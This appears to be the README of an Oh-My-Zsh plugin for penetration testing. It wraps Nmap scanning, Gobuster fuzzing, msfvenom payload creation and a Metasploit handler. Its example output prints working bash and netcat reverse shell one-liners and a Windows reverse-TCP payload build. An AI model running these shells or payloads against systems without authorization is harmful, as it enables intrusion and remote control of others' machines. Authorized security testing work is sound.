Plugin for Oh-My-Zsh, shell functions & automation. It includes a variety of useful functions for network scanning, enumeration, reverse shell generation, and more. Boosting efficiency & and saving time with common initial tasks for pentesting.
Clone this repository into $ZSH_CUSTOM/plugins
(by default ~/.oh-my-zsh/custom/plugins
)
git clone https://github.com/syztem4our666/zsh-pentester.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-pentester
Add the plugin to the list of plugins for Oh My Zsh (inside ~/.zshrc
):
plugins=(
# other plugins...
zsh-pentester
)
Final step restart terminal or:
source ~/.zshrc
Function | Description |
---|---|
seturl |
Sets the URL for fuzzing |
settarget |
Sets the target IP address for scanning |
url |
Displays the current URL target set on seturl |
target |
Displays the current target IP address set for scanning |
create |
Creates folders recon, data, exploits on current directory |
scan |
Scans target IP given in settarget using Nmap |
fuzz |
Fuzz specified URL given in seturl using Gobuster |
fuzzv |
Fuzz vhosts with Gobuster on the specified seturl given using Gobuster |
myip |
Displays your IP address of your specified network eth0, wlan0, tun0 interface |
shellw |
Generates a windows/x64/shell_reverse_tcp payload with your IP of specified network interface, default port is 4444 |
rshell |
Gives you bash & netcat reverse shells with your IP specified network and default port 4444 |
handler |
Sets up a Metasploit handler for windows, with your IP specified network and default port 4444 |
server |
Starts a python web server in the specified directory for file transfer |
phelp |
Displays information about available functions |
create
ls
data exploits recon
seturl http://www.example.com
[+] URL TARGET: http://www.example.com [+]
url
[+] URL TARGET: http://www.example.com [+]
settarget 192.168.1.44
[+] RHOST: 192.168.1.44 [+]
target
[+] IP TARGET: 192.168.1.44 [+]
myip
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
192.168.100.55
rshell
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
bash -c 'exec bash -i &>/dev/tcp/192.168.100.55/4444 <&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.55 4444 >/tmp/f
server
[+] Serving files from /home/attacker/Desktop/target [+]
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
shellw
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe
[+] Staged Payload for Windows has been created [+] IP: 192.168.100.55 Start listener on port:4444 [+]
handler
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.100.55
LPORT => 4444
[*] Started reverse TCP handler on 192.168.100.55:4444
Tested on Kali, so by default fuzzz
& fuzzv
functions use gobuster with SecLists wordlists.
So by doing sudo apt install seclists
default path is /usr/share/wordlists/seclists/
, If is not your default path, on functions fuzz and fuzzv, gobuster will not find the wordlist. Solve this by changing your path of wordlists in the plugin.
nano ~/.oh-my-zsh/custom/plugins/zsh-pentester/zsh-pentester.plugin.zsh
fuzz() {
if [ -f "$HOME/.oh-my-zsh/custom/plugins/zsh-pentester/memory.config" ]; then
source "$HOME/.oh-my-zsh/custom/plugins/zsh-pentester/memory.config"
if [[ -n "$URL" ]]; then
echo "[+] Fuzzing with Gobuster URL: $URL [+]"
#HERE↓↓↓-------------------------------------------------------------------------------------------
gobuster dir -u "$URL" -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt"
else
echo "[x] URL is not set [x]"
fi
else
echo "[x] Configuration file not found. [x]"
fi
}
And search for fuzz & fuzzv functions to change the path of the wordlist.
Here are some ideas for future improvements or features that could be added to the plugin:
- Addition of new Nmap scripts for performing specific scans.(Enum SMTP,SMB etc)
- Integration with other pentesting tools, maybe https://github.com/Tib3rius/AutoRecon
- Initial recon for Windows & AD
- More additional commands for common pentesting tasks.
If you have any suggestions or ideas for future implementations, feel free to share them! Contact me via Twitter Syztem4our666
Contributions are so welcome to improve the functionality and usability of the Zsh pentester plugin.